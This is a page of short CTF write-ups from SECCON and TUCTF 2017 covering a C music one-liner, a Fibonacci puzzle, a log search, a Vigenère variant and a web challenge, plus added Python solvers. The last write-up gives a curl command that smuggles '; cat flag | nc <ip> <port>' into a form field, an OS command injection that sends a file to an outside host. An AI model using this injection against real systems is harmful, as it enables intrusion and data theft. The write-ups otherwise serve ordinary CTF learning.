Solution to SECCON 2017 putchar Music

13/12/17 — capitol

rebels

name: putchar music

category: programming

points: 100

Writeup

We got a one-liner C program and were asked to find the movie title. After adding include lines it looked like this:

#include <stdio.h>
#include <math.h>

main(t,i,j){unsigned char p[]="###<f_YM\204g_YM\204g_Y_H #<f_YM\204g_YM\204g_Y_H #+-?[WKAMYJ/7 #+-?[WKgH #+-?[WKAMYJ/7hk\206\203tk\\YJAfkkk";
for(i=0;t=1;i=(i+1)%(sizeof(p)-1)){double x=pow(1.05946309435931,p[i]/6+13);for(j=1+p[i]%6;t++%(8192/j);)
putchar(t>>5|(int)(t*x));}}

We compiled it with:

gcc putchar.c -lm

When we ran the program it produced a lot of random output in intervals, so we piped it to the sound card with:

./a.out | padsp tee /dev/audio > /dev/null

That produced beautiful music and we are thinking about converting all our mp3s to C now.

flag was SECCON{STAR_WARS}

Solution to SECCON 2017 Run Me!

12/12/17 — capitol

fibonacci

name: Run Me!

category: programming

points: 100

Writeup

We got a small Python program that calculated a number and printed the flag.

import sys
sys.setrecursionlimit(99999)
def f(n):
    return n if n < 2 else f(n-2) + f(n-1)
print "SECCON{" + str(f(11011))[:32] + "}"

The only problem was that it was pretty slow. Looking at the function f, it became clear that it was a recursive implementation of a Fibonacci number calculator.

We can simplify the program by pre-calculating the number, since the input 11011 is static. This is a good resource for doing math online. That gives us the program:

print "SECCON{" + str(6507614083233171766777276154187288240358341392760989984902491921326667585457605178000549170341552439271702840328561596410732394452672590272015290900788967910944916066512809862733753584757624777904321862755950093471816552305606128930720101767444378991257940620968224991697373410765622689788223094397784938845178112697556456770518239391018187508624886493366293371572136529093139262719097225791273275160340010788894939038471629409519199366669811105894961095348747047817191099284000314173465681599018733879575043860768645982805891405607205552155861033341086066665578851825434110576465079875540889584650409148976919395422852814145463061236324017769701768028585337648581591202518463441381695201945794520069750655917002957527094366263378969771437495173646923592054705203089984997473730230799090969319308494708386004361934927301205980583903324687150985695068032887488151044259042416448468383954559045354500568332347996855717363999557681316564450515699474685967818425345171977210008734950628958372825331562933696236173623421185837688690693572541027380896645598840342225996172712013874950565900159843994825561874702585106284285461296489776330925323446584895935477308502492457187445149533397996494290083070178319387620152207714696925237598034413018225734571813503826369767853088756760492594822216460518417649524985117383908070320090763457129150673073346015114094831808545122412896775982603458592206041884594665662184285227125263074854143279129848142006993662878937798665331959648756224181942297184742839066399702740678034652460492554872285123170149251463572664241542301750162874029540102343392999769263586239169354234029625104134099070486906826197242138757699758916549862123430557427669292423256033029538511602849426267792510373124968743108551303775178895414049458386656106089507175550407573781770197191176155492806618661873324988031347264451076949942905467959272940819484165436737313991205121923756888179055433142331477237829982097414615583862154561906590676346778700072897909106294230727
14321397319111715970130151174669992797276293445539760861617336440030158167771970869191088140343413881822920781894388333124029339099939263144538805634147654202831717365638267529461536461367917300661565377015525846611173849663494461429041123993952629470445363197932541803303152120627201578910609457626560492171665716942761589)[:32] + "}"

flag was SECCON{65076140832331717667772761541872}
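Added example (not part of the original writeup): the same value can be computed directly in Python 3 instead of pasting a precomputed number. The names f_naive, fib_iter, fib_doubling and flag are ours; f_naive is the challenge's f, kept only to cross-check small inputs.

```python
def f_naive(n):
    # The challenge's definition: two recursive calls per level, so the
    # number of calls grows exponentially with n.
    return n if n < 2 else f_naive(n - 2) + f_naive(n - 1)


def fib_iter(n):
    # Linear time: carry the pair (F(i), F(i+1)) forward n times.
    a, b = 0, 1
    for _ in range(n):
        a, b = b, a + b
    return a


def fib_doubling(n):
    # Returns (F(n), F(n+1)) in O(log n) steps using the identities
    #   F(2k)   = F(k) * (2*F(k+1) - F(k))
    #   F(2k+1) = F(k)^2 + F(k+1)^2
    if n == 0:
        return (0, 1)
    a, b = fib_doubling(n >> 1)
    c = a * (2 * b - a)      # F(2k)
    d = a * a + b * b        # F(2k+1)
    return (d, c + d) if n & 1 else (c, d)


def flag(n=11011):
    # Same formatting as the challenge: first 32 decimal digits of F(n).
    return "SECCON{" + str(fib_iter(n))[:32] + "}"


if __name__ == "__main__":
    # Cross-check both fast versions against the original definition.
    assert all(f_naive(i) == fib_iter(i) == fib_doubling(i)[0] for i in range(20))
    print(flag())
```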

Solution to SECCON 2017 Log Search

11/12/17 — capitol

logs

name: Log search

category: web

points: 100

Writeup

We got a link to an empty site with the words “Find the flag!”.

Looking at the source we found a link to another page.

That was a search page for accesses to the webpage. Searching for flag gave us this url: http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt

flag was SECCON{N0SQL_1njection_for_Elasticsearch!}

Solution to SECCON 2017 Vigenere3d

10/12/17 — capitol

fractal

name: Vigenere3d

category: crypto

points: 100

Writeup

We got a Python program:

import sys
def _l(idx, s):
    return s[idx:] + s[:idx]
def main(p, k1, k2):
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    t = [[_l((i+j) % len(s), s) for j in range(len(s))] for i in range(len(s))]
    i1 = 0
    i2 = 0
    c = ""
    for a in p:
        c += t[s.find(a)][s.find(k1[i1])][s.find(k2[i2])]
        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)
    return c
print main(sys.argv[1], sys.argv[2], sys.argv[2][::-1])

and some example output:

$ python Vigenere3d.py SECCON{**************************} **************
POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9

Let's call the first argument “flag” and the second “seed”.

Line 2 in the main function creates a three-dimensional lookup table, and as seen in the first line of the for loop, the lookups are based on the flag string, the seed string and the seed string reversed.

Since we know 7 characters of the flag, we can calculate the key string like this:

    plain = "SECCON{"
    encry = "POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9"
    #print seed
    for a in range(0, 7):
        for d in range(0, len(t[s.find(plain[a])])):
            for e in range(0, len(t[s.find(plain[a])][s.find(plain[a])])):
                if t[s.find(plain[a])][d][e] == encry[a] and s[d] == 'A':
                    print "%i %c %c" % (a, s[d], s[e])

which gives us the output:

0 A _
1 A K
2 A P
3 A 2
4 A Z
5 A a
6 A _

Once we know that the seed is AAAAAAA_aZ2PK_ we can calculate the flag with:

    #print flag
    for a in range(0, len(p)):
        for d in range(0, len(s)):
            if t[d][s.find(k1[i1])][s.find(k2[i2])] == encry[a]:
                print "%i %c" % (a, s[d])

        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)

Flag was: SECCON{Welc0me_to_SECCON_CTF_2017}
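Added example (not part of the original writeup): the lookup table is a rotation, t[i][j][k] = s[(i+j+k) % len(s)], so each ciphertext character is the plaintext index plus a combined shift k1[i] + k2[i]. Because k2 is k1 reversed, that shift sequence is a palindrome, and the 7 known characters fix all 14 shifts. This is a Python 3 sketch; the function names are ours, and the key length 14 is taken from the masked seed in the example output.

```python
S = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
N = len(S)
CIPHER = "POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9"  # example output from the challenge


def encrypt(plain, seed):
    # Table-free equivalent of the challenge's main(p, seed, seed[::-1]).
    rev = seed[::-1]
    out = []
    for i, ch in enumerate(plain):
        shift = S.index(seed[i % len(seed)]) + S.index(rev[i % len(rev)])
        out.append(S[(S.index(ch) + shift) % N])
    return "".join(out)


def recover_shifts(known_plain, cipher, key_len):
    # shift[i] = index(k1[i]) + index(k1[key_len-1-i]) mod N, which is
    # symmetric, so every known character fills two positions.
    shifts = [None] * key_len
    for i, (p, c) in enumerate(zip(known_plain, cipher)):
        k = (S.index(c) - S.index(p)) % N
        for pos in (i % key_len, key_len - 1 - i % key_len):
            if shifts[pos] is not None and shifts[pos] != k:
                raise ValueError("known plaintext contradicts key length")
            shifts[pos] = k
    if None in shifts:
        raise ValueError("not enough known plaintext for this key length")
    return shifts


def decrypt(cipher, shifts):
    return "".join(
        S[(S.index(c) - shifts[i % len(shifts)]) % N] for i, c in enumerate(cipher)
    )


if __name__ == "__main__":
    shifts = recover_shifts("SECCON{", CIPHER, 14)
    print("".join(S[k] for k in shifts))  # combined shifts written as characters
    print(decrypt(CIPHER, shifts))
```

The seed found in the writeup, AAAAAAA_aZ2PK_, is one of many seeds that produce these shifts: any seed whose mirrored character pairs add up to the same values encrypts identically.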

Solution to TUCTF 2017 iFrame and Shame

03/12/17 — capitol

arachnid

name: iFrame and Shame

category: web

points: 300

Writeup

We were tired and just pointed arachni at the page, and it reported that there was OS command injection in the form.

Once we knew that, it was just a question of getting the flag. There was some sort of limit on the number of rows returned, so we just piped the flag to our server with nc.

curl 'http://iframeshame.tuctf.com/' --data 'search=" ; cat flag | nc <ip> <port> ; "&Submit=Submit+Query'

flag was TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}